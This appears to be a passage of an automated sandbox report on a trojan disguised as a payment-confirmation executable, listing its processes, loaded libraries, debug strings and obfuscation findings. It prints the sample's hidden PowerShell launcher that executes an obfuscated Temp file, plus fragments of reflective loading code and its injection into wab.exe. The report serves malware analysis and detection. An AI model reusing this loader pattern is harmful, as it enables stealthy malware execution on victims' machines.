      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_02F23A9914_2_02F23A99
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_02F229E014_2_02F229E0
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 2532
      Source: Confirmation transfer Note AGS # 22-00379.exeStatic PE information: invalid certificate
      Source: Confirmation transfer Note AGS # 22-00379.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@7/16@2/2
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeCode function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045C8
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7476
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsrABC3.tmpJump to behavior
      Source: Confirmation transfer Note AGS # 22-00379.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Confirmation transfer Note AGS # 22-00379.exeReversingLabs: Detection: 50%
      Source: Confirmation transfer Note AGS # 22-00379.exeVirustotal: Detection: 58%
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeFile read: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) "
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 2532
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) "Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: \??\C:\Windows\exe\wab.pdb_j source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wab.pdbVowV source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.Configuration.pdbd source: WER5987.tmp.dmp.18.dr
      Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000002.00000002.1633571805.0000000008667000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Xml.pdbd source: WER5987.tmp.dmp.18.dr
      Source: Binary string: \??\C:\Windows\exe\wab.pdbwj source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\exe\wab.pdb source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wab.pdbGCTL source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER5987.tmp.dmp.18.dr
      Source: Binary string: System.Core.ni.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: Microsoft.VisualBasic.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: \??\C:\Windows\mscorlib.pdb7j source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n(C:\Windows\wab.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: mscorlib.ni.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: nC:\Program Files (x86)\windows mail\wab.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: C:\Program Files (x86)\windows mail\wab.PDB source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER5987.tmp.dmp.18.dr
      Source: Binary string: CallSite.Targetore.pdbC source: powershell.exe, 00000002.00000002.1633101698.0000000008600000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000002.00000002.1633571805.0000000008667000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: BO$ .pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: wab.pdb-21-2246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32``oj source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Xml.ni.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdblb source: wab.exe, 0000000E.00000002.1925821576.00000000065A8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb@ source: WER5987.tmp.dmp.18.dr
      Source: Binary string: wab.pdbaD source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.ni.pdbRSDS source: WER5987.tmp.dmp.18.dr
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1633571805.0000000008667000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Program Files (x86)\windows mail\wab.PDB_ source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbBX source: powershell.exe, 00000002.00000002.1622648515.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Configuration.ni.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: mscorlib.ni.pdbRSDS source: WER5987.tmp.dmp.18.dr
      Source: Binary string: !symbols\exe\wab.pdb30 source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.Configuration.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: wab.pdbws\wab.pdbpdbwab.pdbmail\wab.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\exe\wab.pdbiB source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Windows.Forms.pdb` source: WER5987.tmp.dmp.18.dr
      Source: Binary string: System.Xml.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: System.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: wab.pdb source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Program Files (x86)\windows mail\wab.pdb source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Windows.Forms.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: mscorlib.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.1630220347.00000000075E1000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\wab.pdb source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdbWj% source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb| source: wab.exe, 0000000E.00000002.1925821576.00000000065A8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Microsoft.VisualBasic.pdb& source: WER5987.tmp.dmp.18.dr
      Source: Binary string: C:\Windows\wab.pdbpdbwab.pdbq source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb6 source: wab.exe, 0000000E.00000002.1925821576.00000000065A8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.ni.pdb source: WER5987.tmp.dmp.18.dr
      Source: Binary string: System.Core.ni.pdbRSDS source: WER5987.tmp.dmp.18.dr

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000002.00000002.1634084936.000000000A494000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Staden $Sammenstuvesndvningernes $Transfixed), (Schlemiels @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Convolves = [AppDomain]::CurrentDomain.GetAssemb
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Sprydstage)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Onanerendes, $false).DefineType($Ordgyder, $Vi
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) "
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) "Jump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07780308 pushad ; iretd 2_2_07780321
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FBA0D7 push edx; ret 2_2_08FBA0D8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FBA89D push 68950820h; iretd 2_2_08FBA8A3
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FB5414 push eax; iretd 2_2_08FB5415
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FB2007 push eax; iretd 2_2_08FB203D
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FB296C push eax; ret 2_2_08FB296D
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FBAD11 push 8A950820h; ret 2_2_08FBAD17
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FB2E56 push edi; iretd 2_2_08FB2E66
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FB0212 push edi; iretd 2_2_08FB0216
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FB9B71 push eax; retf 2_2_08FB9B74
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FB2F38 push esi; ret 2_2_08FB2F39
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08FBBB27 push 99110720h; iretd 2_2_08FBBB2F
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_04465414 push eax; iretd 14_2_04465415
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0446AD11 push 8A950820h; ret 14_2_0446AD17
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_04462E56 push edi; iretd 14_2_04462E66
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_04462F38 push esi; ret 14_2_04462F39
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_04462007 push eax; iretd 14_2_0446203D
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0446A0D7 push edx; ret 14_2_0446A0D8
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0446A89D push 68950820h; iretd 14_2_0446A8A3
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0446296C push eax; ret 14_2_0446296D
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_04460212 push edi; iretd 14_2_04460216
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_04469B71 push eax; retf 14_2_04469B74
      Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0446BB27 push 99110720h; iretd 14_2_0446BB2F
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeFile created: \confirmation transfer note ags # 22-00379.exe
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeFile created: \confirmation transfer note ags # 22-00379.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exeJump to dropped file
      Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
